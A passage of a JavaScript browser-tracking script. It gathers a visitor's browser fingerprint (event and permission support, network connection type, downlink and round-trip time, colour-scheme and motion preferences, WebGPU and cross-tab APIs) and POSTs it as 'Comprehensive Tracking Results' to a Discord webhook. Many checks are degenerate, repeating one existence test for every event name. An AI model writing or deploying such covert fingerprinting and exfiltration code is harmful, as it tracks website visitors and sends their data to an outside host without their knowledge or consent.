        'pointerenter': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerleave': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'gotpointercapture': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'lostpointercapture': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'abort': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'afterprint': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'animationend': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'animationiteration': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'animationstart': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'auxclick': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'beforeprint': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'beforeunload': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'blur': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'canplay': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'canplaythrough': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'change': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'click': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'close': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'contextmenu': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'copy': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'cuechange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'cut': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dblclick': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'drag': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragend': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragenter': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragexit': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragleave': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragover': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragstart': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'drop': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'durationchange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'ended': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'error': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'focus': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'focusin': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'focusout': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'formdata': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'fullscreenchange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'fullscreenerror': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'hashchange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'input': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'invalid': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'keydown': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'keypress': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'keyup': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'languagechange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'load': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'loadeddata': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'loadedmetadata': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'loadstart': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'message': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'messageerror': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mousedown': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseenter': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseleave': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mousemove': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseout': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseover': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseup': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'offline': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'online': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'open': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'orientationchange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pagehide': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pageshow': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'paste': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'pause': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'play': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'playing': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'popstate': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'progress': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'ratechange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'rejectionhandled': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'reset': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'resize': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'scroll': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'securitypolicyviolation': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'seeked': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'seeking': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'select': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'selectionchange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'selectstart': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'slotchange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'stalled': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'storage': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'submit': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'suspend': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'timeupdate': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'toggle': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchcancel': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchend': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchmove': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchstart': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'transitionend': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'unhandledrejection': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'visibilitychange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'volumechange': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'waiting': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'wheel': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'gamepadconnected': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'gamepaddisconnected': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'devicemotion': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'deviceorientation': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available',
        'deviceorientationabsolute': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available'
    },
    'Events(element.addEventListener)': {
        'pointerdown': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerup': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointermove': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointercancel': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerover': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerout': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerenter': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'pointerleave': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'gotpointercapture': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'lostpointercapture': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'abort': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'afterprint': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'animationend': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'animationiteration': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'animationstart': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'auxclick': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'beforeprint': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'beforeunload': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'blur': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'canplay': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'canplaythrough': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'change': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'click': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'close': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'contextmenu': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'copy': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'cuechange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'cut': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'dblclick': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'drag': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragend': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragenter': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragexit': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragleave': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragover': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'dragstart': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'drop': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'durationchange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'ended': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'error': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'focus': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'focusin': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'focusout': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'formdata': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'fullscreenchange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'fullscreenerror': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'hashchange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'input': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'invalid': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'keydown': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'keypress': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'keyup': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'languagechange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'load': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'loadeddata': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'loadedmetadata': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'loadstart': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'message': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'messageerror': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'mousedown': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseenter': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseleave': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'mousemove': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseout': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseover': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'mouseup': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'offline': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'online': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'open': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'orientationchange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'pagehide': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'pageshow': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'paste': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'pause': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'play': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'playing': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'popstate': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'progress': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'ratechange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'rejectionhandled': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'reset': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'resize': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'scroll': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'securitypolicyviolation': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'seeked': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'seeking': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'select': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'selectionchange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'selectstart': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'slotchange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'stalled': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'storage': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'submit': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'suspend': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'timeupdate': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'toggle': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchcancel': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchend': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchmove': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'touchstart': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'transitionend': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'unhandledrejection': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'visibilitychange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'volumechange': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'waiting': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'wheel': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'gamepadconnected': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'gamepaddisconnected': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'devicemotion': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'deviceorientation': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available',
        'deviceorientationabsolute': typeof document.createElement('div').addEventListener === 'function' ? 'Available' : 'Not Available'
    },
    'Permissions(names)': {
        'geolocation': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'notifications': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'camera': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'microphone': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'clipboard-read': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'clipboard-write': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'background-sync': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'ambient-light-sensor': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'accelerometer': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'gyroscope': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'magnetometer': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'midi': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'payment-handler': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'push': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'persistent-storage': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'nfc': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'idle-detection': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'storage-access': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'window-management': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available',
        'local-fonts': typeof navigator.permissions?.query === 'function' ? 'Checkable' : 'Not Available'
    },
    NetworkInformation: {
        'Type': navigator.connection?.type || 'Unknown',
        'Effective Type': navigator.connection?.effectiveType || 'Unknown',
        'Downlink': navigator.connection?.downlink || 'Not Available',
        'RTT': navigator.connection?.rtt || 'Not Available',
        'Save Data': navigator.connection?.saveData ? 'Yes' : 'No'
    },
    MediaSessionActions: {
        'play': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'pause': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'seekbackward': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'seekforward': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'seekto': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'stop': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'previoustrack': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'nexttrack': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'skipad': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'togglecamera': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'togglemicrophone': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available'
    },
    'MediaSessionActions (handlers)': {
        'play': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'pause': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'seekbackward': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'seekforward': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'seekto': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'stop': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'previoustrack': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'nexttrack': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'skipad': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'togglecamera': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available',
        'togglemicrophone': typeof navigator.mediaSession?.setActionHandler === 'function' ? 'Available' : 'Not Available'
    },
    'CSS Feature/Fingerprint': {
        'CSS.supports': typeof CSS.supports === 'function' ? 'Available' : 'Not Available',
        'prefers-color-scheme': window.matchMedia('(prefers-color-scheme: dark)').matches ? 'Dark' : 'Light',
        'forced-colors': window.matchMedia('(forced-colors: active)').matches ? 'Active' : 'Inactive',
        'prefers-reduced-motion': window.matchMedia('(prefers-reduced-motion: reduce)').matches ? 'Reduced' : 'Normal',
        'inverted-colors': window.matchMedia('(inverted-colors: inverted)').matches ? 'Inverted' : 'Normal'
    },
    WebGPU: {
        'requestAdapter': typeof navigator.gpu?.requestAdapter === 'function' ? 'Available' : 'Not Available',
        'GPUAdapter.requestDevice': typeof navigator.gpu?.requestAdapter?.then === 'function' ? 'Available' : 'Not Available'
    },
    'Cross-Tab': {
        'BroadcastChannel': typeof BroadcastChannel !== 'undefined' ? 'Available' : 'Not Available',
        'localStorage storage event': typeof window.addEventListener === 'function' ? 'Available' : 'Not Available'
    },
    Reporting: {
        'ReportingObserver': typeof ReportingObserver !== 'undefined' ? 'Available' : 'Not Available'
    }
};

// Format for Discord with bold headings and unbolded details
const embed = {
    content: 'Comprehensive Tracking Results',
    embeds: Object.entries(data).map(([category, items]) => ({
        title: `**${category}**`,
        description: Object.entries(items).map(([key, value]) => `${key}: ${value}`).join('\n'),
        color: 5814783
    }))
};

// Send to Discord webhook
fetch(WEBHOOK_URL, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json'
    },
    body: JSON.stringify(embed)
}).catch(error => console.error('Error sending to webhook:', error));
